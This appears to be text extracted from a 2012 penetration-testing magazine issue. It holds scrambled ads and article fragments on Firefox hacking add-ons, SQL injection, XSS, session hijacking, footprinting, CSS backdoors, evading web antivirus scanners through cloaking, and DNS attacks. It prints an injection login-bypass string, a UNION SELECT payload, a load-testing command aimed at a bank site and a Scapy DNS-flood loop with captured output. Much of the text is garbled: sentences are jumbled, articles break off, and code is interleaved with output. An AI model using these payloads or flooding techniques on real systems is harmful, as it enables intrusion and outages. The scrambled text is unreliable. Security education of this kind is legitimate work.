and data exercises for your organization analysis to offer real world peer based metrics of your security issues including use of penetration as well as deep dive technical assessments ranging from penetration / tests as a way of providing users an unforgettable technical assessments to strategic reviews. we both know that you know that game.000 Firewall ruined by a lack of cents! • • • • SERVICES AVAILABLE $250. Forgive the fear tactics. PE E R B A SE D E VA L U A TI O N Ongoing comparison against peers of key IT security metrics and controls. U SE R E D UC A TI O N Custom security training We combine software engineering. S T A TI S TI C A L PE N E T R A TI O N Periodic rotation of professional penetration testers against your network via a custom portal complete with the ability to limit the scope and depth of testing according to client needs. or shall you skip to the next page? As a proof in concept. This challenge can only be met with intelligence. and facts to support our assertions.000 $300. starting with one little email.9081 www. machines. Project Managers who does not have more technically strong in web services field. Figure 1. developers. so web is just a term or another name for internet but services provides us connectivity with other users over internet or web. A web service is just a system which resides somewhere on a network and gives response specific requests from clients. it will be easier if you see the Figure 1 which I have sketched out here. Here our web client is looking for a web page www. The main purpose of this article is to give an overview in testing web services. Service-oriented architecture (SOA) and web services are very popular topics in many development projects. A Web service is a communication service or method through which machines (Computers. Mobiles. The basic Web Services platform is XML + HTTP. you can skip all the deeper functionalities about how it works.google. 
which can publish its function or message to the rest of the world.OVERALL Web Services and Testing The articles listed below provide an overview about web-services and its testing. clients are not only the people working on their computers on the desk. Notebooks.com as you can see in our example. now this request is received by Google web server and it sends the Google webpage to your browser. Here you must be aware about why we are using the term Services. Interaction between web client and google web server 01/2012 Page 36 http://pentestmag. people over internet. and PDA etc) can communicate over the web (internet). This article would be helpful for testers. W eb Services can convert your application into a Web-application. Web Services are just a simple combination of different technologies that allow for making connections between different computers. so just open your browser and put the URL and hit the Enter button. and it can also be some machines. So the basics are simple. It is a great step towards simple access to software and data over the network.com . Here you must be aware of the term clients. html. web browsers like Mozilla Firefox come with the support of add-ons. my IP address changed to 85. The best part about these add-ons is that they enable third-party developers to add new features without interfering with the original source code of the host application. Tor basically has a worldwide network of servers that helps route the internet traffic and thus.OVERALL Ready Your Firefox for Pentesting Although even today web browsers serve the primary purpose of bringing information resources to the user.com Page 44 .20) will automatically open up with a congratulations message that your IP address is now changed.65. Start Tor Browser. penetration testing.238. Pen Testing Add-ons Tor Tor: Experts always suggest that it’s best to hide your identity before getting involved in any security related operations. 
01/2012 • WHOIS WHOIS: Internet resources such as domain name. Now. the browser (Firefox 3.en. disguise a user’s geographical location. WHOIS is used to query the http://pentestmag. they no longer represent a software application with bare bones support for just HTML.mozilla. This bundle will will ask your permission to extract a bundle of files to the location where Tor installer was downloaded. and more. which is located in Netherlands. These add-ons are dependent on the services that are provided by the host application to register themselves. IP addresses or controller systems are registered in database systems. Using the privacy and security add-ons from this gallery. third party developers can update their add-ons without making any changes to the host application as the host application operates independently. T hese add-ons when installed inside a browser can add additional functionality to the browser and this additional functionality can be used on the web pages that are viewed by the user. Once you’re connected to the Tor Network. Thus.6. Today.torproject. we can build a good browser based application for penetration testing and security purposes.org/en-US/ firefox/) is a huge repository for add-ons that support Mozilla software like Mozilla Firefox browser.223. These addons are submitted by many developers from across the globe for end-users. which are small installable enhancements to a browser’s foundation. For example. These add-ons can serve for scatterbrained as well as for informative purposes like hacking.org/download/download. Mozilla Firefox Add-ons Mozilla Add-ons (https:// addons. you need to first download the Tor Browser Bundle from Link: https:// www. • To setup Tor. The best thing about Tor is that it’s open-source and anybody can use Tor network for free. Tor allows user to maintain online anonymity. Hovering over the flag will display information such as domain Figure 3. Using this. 
Flagfox: This extension introduces a flag icon on the right hand side of your address bar (see Figure 1). This flag shows the web server's physical location. Clicking on the flag icon will by default take you to Geotool, which is Flagfox's default action (see Figure 2). Geotool uses databases for cognizing the data about the resource: name, IP address and server location, registrants and administrative information. Right clicking on the flag will let you access additional information about the web site using external lookups such as DomainTools WHOIS, WOT Scorecard, McAfee SiteAdvisor and many more. You can also add additional lookups which you find necessary. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/flagfox/)

Figure 1. Flagfox in Firefox 6.0
Figure 2. Geotool lookup of a website

01/2012 Page 45 http://pentestmag.com

Exploit Database Search: The Exploit Database (http://exploit-db.com/) is an archive of more than 15000 exploits and software vulnerabilities. This exploit database is a great place for information security researchers and penetration testers for getting an exploit's information in plain text format. Offsec Exploit-db Search: This add-on simply adds Offsec Exploit Archive search among other installed search engines in your Firefox. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/offsec-exploitdb-search/)

Figure 3. Offsec Exploit Archive Search
Figure 4. Offsec Exploit Archive Search

SQL Injection: Database applications are critical in today's web scenario. If a database application is unable to filter out escape characters then it becomes very easy for malicious users to perform SQL code injection on a vulnerable application. A malicious user can gain access to the server and can delete or modify records. Recently websites like Kathmandu Metropolitan City, Metropolitan UK Police, Nepal Telecommunications Authority, BART Police Database and NASA Forum were exposed to the SQL injection vulnerability.

SQL Inject Me 0.4.5: This add-on comes from a leading information security firm, Security Compass. This add-on will test a website for SQL injection vulnerabilities by substituting HTML form values with crafted database escape strings that are used in an SQL injection attack. Although this extension will not try to expose the security of a website, it'll look for database error messages in the page. Thus, this extension will enumerate the possible entry points without intruding into the system, just like a web vulnerability scanner. SQL injection plays an important part in any pen testing routine. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/)

• To use this add-on you need to go to Tools > SQL Inject ME > Open SQL Inject Me Sidebar.
• Once you're at a login page or on a HTML form, you can test this add-on by clicking the 'Test all forms with all attacks' buttons in the sidebar to test that particular page (see Figure 5).

Cross-site scripting (XSS): XSS vulnerability is usually found in web applications. In this attack, a malicious user crafts a URL of a vulnerable website in such a way that when the malicious code is executed then the client's session cookie is sent to the malicious user. This enables him to steal sensitive information from the client's account. The crafted malicious link can easily embed a HTML document inside a frame using the inline HTML frame tag <iframe>…</iframe>. Recently websites like Bing.com (MAPS), Google Appspot, Forbes, EC Council and Samba Web Administration Tool (SWAT) were exposed to the XSS vulnerability.

XSS Me 0.4.4: This tool works in the same way as SQL Inject Me. XSS Me comes from SecCom Labs. This add-on detects reflected XSS vulnerabilities and points out the possible entry points for an attack. This add-on shows the resulting HTML page as vulnerable only when the JavaScript value (document.vulnerable=true) is set. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/xss-me/)

Figure 6. XSS Me Test Results

Access Vulnerability: Web servers can sometimes be affected by a file access vulnerability where a malicious user uses a mere web browser to get unauthorized access to the files stored on the server. The malicious user gets access to the file by specifically requesting its name by using a non-standard URL for bypassing the file access controls of the server. This vulnerability doesn't allow the malicious user to delete, modify or create a file. Hence, the user can only read or copy the file from the computer.

Access Me 0.4: Web applications affected by access vulnerability are tested with four different methods. File access requests are sent by using the session removed method, the HTTP HEAD verb (retrieve whatever information in the form of an entity without returning a message-body in the response), the SECCOM verb, and a combination of session and HEAD/SECCOM. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/access-me/)

Figure 7. Access Me Test Summary

User Agent: A user agent is basically a client side application like a web browser or search engine crawler. User agent strings store information like type of application, OS, and software version. This user agent string is detected by websites for adjusting the page design layout. Hence, user agent spoofing is done by web scrapers and spam bots for forcing certain server side contents to show up by hiding the browser's identity. For example, the Android browser uses the HTML rendering engine WebKit (KHTML) and so the Android browser pretends to be Safari.

User Agent Switcher 0.7.3: This add-on by Chris Pederick helps change your browser's user agent string to Internet Explorer, Search Robots (Googlebot 2.1, Msnbot 1.1, and Yahoo Slurp) or iPhone 3.0. To access User Agent Switcher go to Tools > Default User Agent. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/)

Figure 8. User Agent Switcher Menu

Hackbar: Hackbar 1.6.1 is a simple but powerful penetration and security audit tool. Basically you put a link in the hackbar and then you have to select various suitable options from the drop down menu and then just execute the edited URL. The SQL and XSS options of this add-on will help you add statements into your URL; for example, clicking on Union Select Statement under SQL will give the output: UNION SELECT 1,2,3,4,5,6,7,8,9,10. Hackbar also has an encoder-decoder which can perform Base64/URL/HEX encoding and decoding. Hackbar is also capable of converting a text or link to its MD5, SHA-1 or SHA-256 hash or to ROT13 form. The other amusing uses are viz. insertion of Lorem Ipsum text, string reverse, fibonacci series and more. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/)

Figure 9. Hackbar

Tamper Data 11.0.1: Tamper Data can effectively be used for testing web based applications. This add-on will allow you to intercept the HTTP(S) traffic between your computer and the Internet. You can track and modify HTTP(S) headers, POST and GET request parameters. Tamper Data is particularly useful when username and password parameters are passed through an HTTPS request, which allows you to modify them by adding SQL Injection/XSS text to the username/email and password fields. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)

• Once you install Tamper Data, go to Tools > Tamper Data. This will open a log window. Click Start Tamper from the top menu to start tampering with the HTTP(S) requests. The log will start showing you all the subsequent requests after you start tampering. To see details of a request you need to select the item and double click it to see the details of the request header.
• When a request is made through your browser, a pop-up prompts you to tamper the request, submit it without tampering or abort the request. Selecting tamper will show you a tamper window where you can edit the data using the context fields; after that you can submit the modified values.
• If you right click an item and select Replay in browser, then you can modify that item's parameters like protocol, host, port, path and you can then click OK to see the URI getting replayed with the modified details that you entered. These parameters show up in the tamper window.

Figure 10. Tamper Data
Figure 11. Tamper Data Log Window
Figure 12. Tamper with request
Figure 13. Tamper Data Context Field Modify Window

Cookies Manager+ 1.5.1: This add-on can edit domain, path and name of multiple cookies. The edited cookies can be saved as new entries or can replace the old entries. Also, the add-on can backup and restore all or selected cookies, export cookie information onto your clipboard and automatically monitor cookie changes. Please remember the fact that you can only edit cookies from your current session; once the session ends, the cookies will expire because we are using the bundled Firefox browser that came with Tor. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/)

Figure 14. Cookies Manager+

Conclusion

It is quite simple for a pen tester to make a good pen testing application from a freely available browser like Firefox. The Firefox project was released back on November 9, 2004, and the number of add-ons that are available for the Firefox community is in large numbers. Due to the large number of add-ons available for Firefox, it is a lot easier for even beginners to use third party add-ons for converting their browsers to something as strong as a hacking application. Apart from this, one should also understand that there are a lot of alternate add-ons available for doing the same XSS, SQL Injection or HTTP request modify / replay. An older version of Firefox (Firefox 3.6.20) was used because most add-ons are compatible with this version and not with the latest 6.0 or 7.0b1 versions of the browser. In the beginning we used Tor Browser Bundle because it's portable, doesn't store any history logs and you can relocate the browser and Tor to any computer you like without installing anything. Also, once you install all your important add-ons on the browser that is used by Tor Browser Bundle, the add-ons stay with the browser and you don't need to install them every time you change systems.

DHANANJAY D. GARG
The author holds a Bachelor's Degree in Electronics & Telecommunication. He holds a diploma in Cyber Law and Information Security & Ethical Hacking. He likes working on projects related to information security. As a freelance writer, he often writes on topics related to computer sciences. He has written articles for journals like PenTest Magazine, Data Center Magazine and Enterprise IT Security Magazine. He can be reached out at: [email protected].
Web Application Security Vulnerabilities Have Been Prevalent The Last Decade

Port 80 and Port 443 have been a great attack vector for malicious attackers. This article will discuss the three most common and devastating software security vulnerabilities: SQL injection, Cross Site Scripting and Cross Site Request Forgery. We will look at each of these vulnerabilities from the outside as an attacker would as well as inside the source code where they reside and your developers program them. We will then offer solutions on how to fix them and offer more secure software to your enterprise.

The purpose of this article is to discuss white box testing, or having full knowledge of the source code and how the application works. Many of my colleagues participate in black box testing rather than white box testing. Black box testing is also known as zero knowledge testing, where the testing team is provided no knowledge of the resource to be tested and has to acquire information on its own. I believe white box testing is important when doing a penetration test to get a full threat picture of the application that you are looking at. Another point to bring up is that the earlier this is completed in the software development life cycle, the cheaper it is to fix, as well as the lower the attack surface your application has.

To understand these commands more fully it is important to understand the TCP/IP handshake process. TCP/IP is a stateless protocol sending responses and requests through GET, POST and HEAD. Cookies often store state data as well as authentication and tracking data that may or may not be sensitive. With a proxy tool like Burp Suite (http://portswigger.net/burp/), Open Web Application Security Framework WebScarab (https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) or Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/), all client side validation can be bypassed and direct commands can take place on the server through a man in the middle proxy. With this basic understanding we can now completely understand how SQL Injection, Cross Site Scripting and Cross Site Request Forgery work.

SQL injection is a web application security attack that can be devastating to an application. SQL injection at its most basic level is mixing code and database commands to extract, modify or delete data in the database. SQL injection can allow an attacker to bypass login functions or extract data. One of the simplest SQL injection attacks to bypass authentication is ' or 1=1-- (Pasted from http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/). The source code for this would look something like this:

Select * From User Where

The problem with this code snippet, whether it be in Java, .NET, PHP or any language that you chose, is that the value of the USER is not validated and the

ATTACK
Session Hijacking

Even if you were drunk and surfing at a Wi-Fi hotspot, you probably wouldn't stand up and shout your username and password for anyone who might want it. But an attacker does not need to find out your username and password. The attacker's target might be your session.

Session hijacking is the exploitation of a valid user session to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a cookie used to authenticate a user to a remote server. Session hijacking, also known as TCP session hijacking, allows a user to take control over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user's session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network. When implemented successfully, attackers assume the identity of the compromised user, enjoying the same access to resources as the compromised user. The intrusion may or may not be detectable, depending on the user's level of technical knowledge and the nature of the attack. If a web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason, session hijacking is a possible cause.

Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user's connections. The most useful method depends on a token the Web Server sends to the client browser after a successful client authentication. The session ID is normally stored within a cookie or URL. For most communications, authentication procedures are carried out at set up. Session hijacking takes advantage of that practice by intruding in real time, during a session.

Figure 1. Session ID

Finding your Target

As a security analyst, footprinting is also one of the most enjoyable parts of my job as I attempt to outperform the automatons. With this article I am going to share some of the steps, tips and tricks that pentesters and hackers alike use when starting on an engagement.

Network footprinting is, perhaps, the first active step in the reconnaissance phase of an external network security engagement. This phase is often highly automated with little human interaction as the techniques appear, at first glance, to be easily applied in a general fashion across a broad range of targets. While the temptation exists to merely feed a domain name into a tool or script and take the output as your completed footprint, this will not yield a passable footprint for two reasons. Firstly, a single tool will not have access to all the disparate information sources that one should consult, and secondly the footprinting process is inherently iterative and continuous. A footprint is almost never complete; instead, data provides the best current view of the target, but the information could change tomorrow as new sites are brought online, or old sites are taken offline. Thus as a datum is found that could expand the footprint, a new iteration of the footprinting process triggers with that datum as the seed, a fork of the footprint, and the results are combined with all discovered information. A basic footprinting methodology covers reconnaissance, DNS mining, various information services (e.g. whois, Robtex, routes), network registration information and active steps such as SSL host enumeration.

Approach

As with most things in life having a good approach to a problem will yield better results, and over time as your approach is refined you will consume less time while getting better results. By following a methodology, your footprinting will become more repeatable and thus reliable. All these become very useful when selecting targets; it is all about finding that one target that everybody forgot about or did not even know they had, that one old IIS 5 webserver that is not used, but not powered off.

Know your target

The very first thing to do is to get to know your target organization. What they do, who they do it for, where they do it from, both online and in the kinetic world, and what community or charity work they are involved in. This will give you an insight into what type of network/infrastructure you can expect. Reading public announcements, financial reports and any other documents published on or by the organization might also yield interesting results. For any organization that must publish regular reports (e.g. listed companies), these are a treasure trove of information for understanding the target's core business units, corporate hierarchy and lines of business. Dumpster diving, if you are up for it and have physical access to the target, means sifting through trash to get useful information, but in recent times social media can provide us with even more. Sites like LinkedIn, Facebook and Twitter can provide you with lists of
Search Form Based DoS

Many of today's applications have prevention against attack vectors like wildcard queries. But this still does not mean that they are not exposed to Denial of Service attacks.

Search forms can include common attack vectors (SQL, XSS etc.) which can be found during the penetration tests, and these forms also leave open doors to DoS attacks. Especially, the attacks with wildcard queries or the attacks using the maximum number of database search results can cause an outage on the target application. But even the simple search queries (space, period etc., only one character), which are not as effective as wildcard attacks, increase the application server's response time if you find a good way to increase the amount of database results. With this in mind, there is a good advanced search form in our target web application as you can see below. The bank money transfer feature of the application will create complex queries (containing more than one keyword like bank account, money, score, credit) and as a result of these complex queries the number of results will be greatly increased. It will be a good

Figure 1. Advanced Search

Listing 1. Advanced search
bunyamin@symturk [bunyamin@symturk]# ab -n 1 -c 1 -f ALL http://www.bank.com/
00:10:16 00:10:19 00:10:22 00:10:26 00:10:29 00:10:35 00:10:38
2162.128 [ms] (mean, across all concurrent requests)
2104.780 [ms] (mean, across all concurrent requests)
2151.369 [ms] (mean, across all concurrent requests)
3368.925 [ms] (mean, across all concurrent requests)
2577.250 [ms] (mean, across all concurrent requests)
2455.078 [ms] (mean, across all concurrent requests)
4132.905 [ms] (mean, across all concurrent requests)

CSS Backdoors: Hiding Malicious Payloads Inside Cascading Style Sheets

When a website gets compromised a new file is often created by the attacker. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads, where he or she can sometimes do almost the same on the system as any other user. So it wouldn't be smart to block that user from the system, as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead.

Sometime ago, I discovered a couple of persistent (stored) Cross-Site Scripting vulnerabilities in vBulletin [1] [2], where the first was simply found with standard research but also a bit of luck [4] [5], while RSnake's XSS Cheatsheet [3] was used to aid me in bypassing the custom Anti-XSS filter inside vBulletin. All of this was great, but as I dived deeper into executing JavaScript via CSS (Cascading Style Sheets), I realized at that time that attackers, such as knowledgeable script kiddies, or black hats, could hide a JavaScript payload in one of the CSS files, which are essentially the same as the templates since they are loaded with the HTML page, where the latter is the most important in this case. But how is it possible? (Check Listing 1)

In fact, vBulletin uses e.g. over 100 CSS files for each style, and if the CSS changes are stored only inside the database, an unaware administrator may not realize his or her installation of vBulletin has been compromised, as they may be unaware that backdoors can hide in CSS. There are of course limitations to these backdoors, as the page may not load the entire CSS library at once and therefore the most appropriate CSS file for infection must be chosen.

Figure 1. Screenshot of JavaScript execution inside a CSS file on vBulletin

Listing 1. How to execute JavaScript in CSS

Firstly, it's important to know how it is possible to even execute JavaScript inside the templates or files. I'm not even sure that I've collected most of the known possible ways, but after reading through RSnake's XSS Cheatsheet [3], and while searching through the Internet, I came up with a nice list as seen in Listing 2. As you can see, these are just some of the ways, where most, if not all of them, are mentioned at RSnake's website. With HTML5 and CSS3, you can change presentation, and new vectors enabling JavaScript will most likely be possible.

How to pentest well-known CMS

Today, a new website is created about every minute. These entire websites are created with the same CMS. Most new websites have the same look, page structure, administration website, etc. The only difference is the logo of the website and different colors. All these different things create the signature of each CMS.

The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content, manage users, customize the theme, etc. Anybody can be an owner of a website today very easily. Although the web master does not understand anything about web programming, he can still create a beautiful or nice website because the CMS is managed via a web interface. A web master just has to click, click and click, then voila! the new website has been created. The web master can add a new feature to the CMS by installing a new plugin. The coin has 2 sides. The bad side is that if someone can find a vulnerability in the core of the CMS or in a well-known plugin, he can then hack all websites that use the vulnerable CMS or the vulnerable plugin too. In this article, I will discuss how to pentest 3 well-known CMS: Joomla, Drupal and Wordpress. This tutorial will show you how to get the information for the common CMS websites and how to pentest them.

Identify the web

The first thing we must know before pentesting the website is what CMS was used, because each CMS has different default files or structure. Normally, when a user has completed the CMS installation, he often forgets to remove unnecessary files from the website. Those files will be the signature of the CMS and default configurations will let us know what CMS was used. We can analyze the target website with the following 2 methods.

By manual testing

Figure 1. Example administrator page of Joomla (http://192.168.253.128/1/administrator/)
Figure 2. Example administrator page of Wordpress (http://192.168.253.128/3/wp-login.php)

Bypassing Web Antiviruses

At the beginning of April 2010 I made a test of systems for searching for viruses at web sites [1]. And later I presented my results of testing web antiviruses at the conference of UISG and ISACA Kiev Chapter #6 [2]. In this article I'll describe methods of bypassing web antiviruses, which developers of such systems need to take into account to prevent malware from hiding from them.

I've examined the following web antiviruses: Web Virus Detection System, McAfee SiteAdvisor, Norton Safe Web, StopBadware, Google, Yahoo, Yandex. In my research I have examined different systems for searching for viruses at web sites, both standalone and built into search engines; these systems can be called web antiviruses. And every web antivirus can face malware's attempts to hide from it (so malware will be left undetected and continue to infect visitors of web sites). This concerns all systems for searching for viruses at web sites, including search engines with built-in antiviruses.

Bypassing systems for searching for viruses at web sites is possible with the use of cloaking (which has been known since the 90s and is used for hiding from search engine bots for SEO purposes). So the same cloaking which is used for SEO can be used for malware spreading and hiding from systems for searching for viruses at web sites which have no counter-measures against it. I have seen the use of the cloaking method in malicious scripts many times during my research since 2008. In particular I saw checking of the Referer (and a similar approach can be used for the User-Agent). When the User Agent is analyzed and it's a search engine, then the malicious code is not shown; if it's a browser, then it is shown. Antivirus companies and other security researchers also sometimes find cases of cloaking used against search engines with built-in antiviruses. Example: in May 2010 many web sites on shared hosting at DreamHost and other hosting providers were hacked and infected with malicious code, and the code for distributing the malware was using cloaking for hiding itself from the built-in antiviruses in the search engines Google and Yahoo. And these methods of protecting malicious code from systems for searching for viruses create a serious challenge for these systems, particularly for search engines with built-in antivirus systems, because they are using the bots of the search engines with known user agents.

Effective use of cloaking against web antiviruses

At the end of August 2011 I found that Google started using User-Agent spoofing for its bots. This can be connected with the desire to improve their system for searching for viruses at web sites, so using cloaking (UA spoofing is a type of it) to decloak viruses at web sites. But it uses spoofing ineffectively, and with considered use of cloaking the malware can effectively hide from
Bypassing of systems for searching viruses at web sites In May 2010 I’ve published the article to The Web Security Mailing List Archives [3] about bypassing systems for searching of viruses at web sites. Google. Norton Safe Web. StopBadware. Use 1 to demand recursion. Domain name system 01/2012 Page 88 http://pentestmag. he is considered the inventor of DNS. and specifies that the responding name server is an authority for the domain name in question. DNS listens on port 53 where UDP is used to resolves domain names to IP addresses and vice versa. or a response (1). This identifier is copied to the corresponding reply and can be used by the requester to match up replies to outstanding queries. This bit is used to report whether or not the response you receive is authoritative. ARPAnet. It is estimated that 20% of total Internet traffic amount is DNS traffic.ATTACK How to Successfully Attack DNS? DNS is a very attractive to attack as very often IT administrators forget to implement measures to secure DNS service. Figure 1. It can also enlist TCP on the same port for zone transfer of full name record databases. D NS was proposed by Paul Mockapetris in 1983 (in RFC’s 882 and 883). The values have the following interpretation: 0 – No error condition 1 – Format error – The name server was unable to interpret the query. TC TrunCation – specifies that this message was truncated. QR – A one bit field that specifies whether this message is a query (0). RA Recursion Available – this be is set or cleared in a response.com . RCODE Response code – this 4 bit field is set as part of responses. and denotes whether recursive query support is available in the name server. RD Recursion Desired – this bit directs the name server to pursue the query recursively. Recursive query support is optional. Together with Jon Postel. 2 – Server failure – The name server was unable to process this query due to a problem with the name server. 
as a distributed and dynamic database – as opposed to the single table on a single host that was used by the earlier version of the internet. AA Authoritative Answer – this bit is only meaningful in responses. Structure of a DNS packet ID – A 16 bit identifier assigned by the program that generates any kind of query. OPCODE – A four bit field that specifies kind of query in this message. Z – Reserved for future use. Listing 1. Output Welcome to Scapy (2.2.0) >>>top_level = ".rs" >>>cnt = 1000 >>> >>>domain = "example" >>>dns_server = "10.123.11.2" >>>for i in range(0, cnt): ... s1 =s.lower() ... print i ,q Received 2 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=115 id=27939 flags=DF frag=0L ttl=126 proto=udpchksum=0x59e8 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=3015 len=95 chksum=0x21d4 |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='ponlj.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900 3 xx.example.rs Begin emission: * ... s = RandString(RandNum(1,8)) ... q = s1+"."+domain+top_level ... sr1(IP(dst=dns_server)/UDP(sport=RandShort())/DNS( ... rd=1,qd=DNSQR(qname=q))) Finished to send 1 packets. Received 1 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=112 id=27941 flags=DF frag=0L ttl=126 proto=udpchksum=0x59e9 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=56637 len=92 chksum=0xd320 0 2dat.example.rs Begin emission: ..* .Finished to send 1 packets. 
Received 4 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=114 id=27935 flags=DF frag=0L ttl=126 proto=udpchksum=0x59ed src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=10385 len=94 chksum=0x21ac |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=n ame-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='2dat.example.rs.' qtype=A qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x19\nhostmaster\xc0/ x00*0' |>ar=None |>>> w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\x00$\xea\x00\x00\ 1 e0qysndm.example.rs Begin emission: * |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=name-error qdcount=1 ancount=0 nscount=1 arcount=0 qd=<DNSQR qname='xx.example.rs.' qtype=A rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x17\ x00$\xea\x00\x00\x00*0' |>ar=None |>>> 4 6348lzwk.example.rs Begin emission: qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA nhostmaster\xc0-w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\ Finished to send 1 packets. Finished to send 1 packets. Received 1 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=118 id=27937 flags=DF frag=0L ttl=126 proto=udpchksum=0x59e7 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=42090 len=98 chksum=0xecab |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode= qd=<DNSQR qname='e0qysndm.example.rs.' qtype=A rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x1d\ x00$\xea\x00\x00\x00*0' |>ar=None |>>> 2 ponlj.example.rs Begin emission: * name-error qdcount=1 ancount=0 nscount=1 arcount=0 qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA nhostmaster\xc03w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\ .Finished to send 1 packets. 01/2012 Page 89 http://pentestmag.com ATTACK 3 – Name Error – Meaningful only for responses from an authoritative name server, this code signifies that the domain name referenced in the query does not exist. 
4 – Not Implemented – The name server does not support the requested kind of query.
5 – Refused – The name server refuses to perform the specified operation for policy reasons.
QDCOUNT – an unsigned 16-bit integer specifying the number of entries in the question section. Set this field to 1, indicating one question.
ANCOUNT – an unsigned 16-bit integer specifying the number of resource records in the answer section. Set this field to 0, indicating that no answers are provided.
NSCOUNT – an unsigned 16-bit integer specifying the number of name server resource records in the authority records section.
ARCOUNT – an unsigned 16-bit integer specifying the number of resource records in the additional records section.

DNS Request Flooding
As I mentioned above, DNS uses UDP queries for name resolution. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block, because the source addresses are easily spoofed. A DNS flood works by sending a large number of rapid DNS requests, flooding the server with an amount of traffic that it can't handle, so that the performance of the server drops for legitimate requests. Scapy is a packet manipulation program that can forge requests and send them to a specified host. Below I show how it can be used in a DNS flooding attack (Listing 1 and Listing 2).

DNS Response Flooding
In this attack a client or name server floods a name server with requests for records for which the server is authoritative, using a spoofed source IP address. This results in the flooding of the target network – the network associated with the spoofed IP address – with DNS responses to requests never issued from that network (Figure 2).

Figure 2. DNS Response flooding

Listing 2. Tcpdump output
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
15:33:50.292083 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 61) ws003.local.10385 > dns.company.com.domain: [udp sum ok] 0+ A? 2dat.example.rs. (33)
15:33:50.292865 IP (tos 0x0, ttl 64, id 41127, offset 0, flags [DF], proto UDP (17), length 70) ws003.local.37817 > dns.company.com.domain: [udp sum ok] 10990+ PTR? 2.11.123.10.in-addr.arpa. (42)
15:33:50.293051 IP (tos 0x0, ttl 126, id 27933, offset 0, flags [DF], proto UDP (17), length 102) dns.company.com.domain > ws003.local.37817: [udp sum ok] 10990* q: PTR? 2.11.123.10.in-addr.arpa. 1/0/0 2.11.123.10.in-addr.arpa. PTR dns.company.com. (74)
15:33:50.293235 IP (tos 0x0, ttl 64, id 41127, offset 0, flags [DF], proto UDP (17), length 72) ws003.local.54183 > dns.company.com.domain: [udp sum ok] 35417+ PTR? 119.21.123.10.in-addr.arpa. (44)
15:33:50.293629 IP (tos 0x0, ttl 126, id 27934, offset 0, flags [DF], proto UDP (17), length 159) dns.company.com.domain > ws003.local.54183: [udp sum ok] 35417 NXDomain* q: PTR? 119.21.123.10.in-addr.arpa. 0/1/0 ns: 21.123.10.in-addr.arpa. SOA dns.company.com. hostmaster.alcoyu.co.yu. 3325 900 600 86400 3600 (131)
15:33:50.296174 IP (tos 0x0, ttl 126, id 27935, offset 0, flags [DF], proto UDP (17), length 114) dns.company.com.domain > ws003.local.10385: [udp sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 10800 3600 2419200 10800 (86)
15:33:50.296217 IP (tos 0xc0, ttl 64, id 17068, offset 0, flags [none], proto ICMP (1), length 142) ws003.local > dns.company.com: ICMP ws003.local udp port 10385 unreachable, length 122
        IP (tos 0x0, ttl 126, id 27935, offset 0, flags [DF], proto UDP (17), length 114) dns.company.com.domain > ws003.local.10385: [udp sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 10800 3600 2419200 10800 (86)
15:33:50.339515 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 65) ws003.local.42090 > dns.company.com.domain: [udp sum ok] 0+ A? e0qysndm.example.rs. (37)
